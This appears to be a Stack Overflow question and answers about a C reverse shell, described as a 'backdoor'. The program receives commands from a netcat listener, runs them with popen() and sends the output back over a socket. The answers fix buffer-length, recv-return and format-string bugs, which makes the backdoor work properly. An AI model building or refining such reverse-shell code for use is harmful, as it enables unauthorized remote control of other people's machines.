# How can I clean up the popen output of my C program?

Tags: c, sockets, popen

I am rewriting a simple reverse-shell program I made in python, now in C.

The program is supposed to be trying to connect to a host(netcat listening on the specified port) and then take the output from nc, sent over a tcp socket, and make a system call using popen() and then send back the terminal output via the socket connection to nc where it is displayed.

When I try sending commands the program returns what I requested, but also some giberish.

Ex.:
`` /Users/jacob/Library/Developer/Xcode/DerivedData/backdoorfbhufkccmceisqaozrfitkmfsvge/Build/Products/Debu@Ԓ`?    ??????0d?r? ``

(Output from nc in terminal, this was a 'pwd' command)

I also seem to have some kind of problem where a buffer isn't cleared? When I use the 'say' command(say [sentence] ) MacOS is supposed to use voice the sentence. This happens, but only the 2 first letters of the argument after 'say'(the 2 first characters of the sentence) and then says an earlier string. ('Successfully connected!')

Ex.: (command: 'say hello')

`heSuccessfully connected!`

I have tried to open the FILE stream in different places and

Code (after socket setup and connection):

```
    const char conMsg[25] = "Successfully connected!\n";

    send(netSock, conMsg, sizeof(conMsg), 0);
    printf("Sent message...\n");
    
    // variable setup
    char command[] = "clear";
    char buffer[256];
    const char INPUTFIELD[3] = "\n> ";
    
    // requests loop
    while (1) {
        send(netSock, INPUTFIELD, sizeof(INPUTFIELD), 0);
        
        // recv command
        recv(netSock, &command, sizeof(command), 0);
        printf("recived command...\n");
        printf(command);
        
        // exit check
        if ( strncmp(command, ":exit", 5) == 0) {
                close(netSock);
                exit(0);
        } else {
            
            // stream init
            FILE *in;

            in = popen(command, "r");
        
            // popen output, send to host
            while ( fgets(buffer, sizeof(buffer), in) != NULL) {
                send(netSock, buffer, sizeof(buffer), 0);
            }
            pclose(in);
        }
    }
    
    return 0;
```

How I use the program:

- nc -l [specified port] (MAC or Linux terminal command(maybe Windows aswell))
- Start binary (should not matter as I plan to have it try to connect, but that functonality is lacking as of now)

Comment: Use your compiler warnings `const char INPUTFIELD[3] = "\n> ";`this is not good, this should be 5, 4 letters and final `\0`, command seems too small. Use valgrind or any memory tools to check your memory issue

Comment: @Ôrel: Actually, `\n` is one character, so the total size would be 4. But your point is correct otherwise.

Comment: yeap sorry hard to count without \n highlighted

Answer (score 2, accepted):

I think your main issue is here:

```
        // popen output, send to host
        while ( fgets(buffer, sizeof(buffer), in) != NULL) {
            send(netSock, buffer, sizeof(buffer), 0);
        }
```

`fgets` will read just to an end of line (including the end of line character) and then null terminate. Unless a line exceeds the buffer size, it won't fill the buffer completely. Your `send` call is sending the entire buffer regardless, including any uninitialized gibberish that may be past what `fgets` read. This might work better:

```
        // popen output, send to host
        while ( fgets(buffer, sizeof(buffer), in) != NULL) {
            send(netSock, buffer, strlen(buffer), 0);
        }
```

Answer (score 4):

```
    // recv command
    recv(netSock, &command, sizeof(command), 0);
    printf("recived command...\n");
    printf(command);
```

You ignore the return value of `recv`, so none of your other code has any idea how many bytes of data you received. Also, you pass `command` to `printf`. This has two problems:

1. What if you didn't receive a zero byte? You could run right off the end of the buffer.
2. What if the received data includes a `%s` or other string that is special to `printf`?

Comment: Use this instead: `int numRecvd = recv(netSock, &command, sizeof(command), 0); if (numRecvd > 0) { printf("received command...\n%.*s", numRecvd, command); } else if (numRecvd == 0){ /* disconnected */ } else { /* error */ }`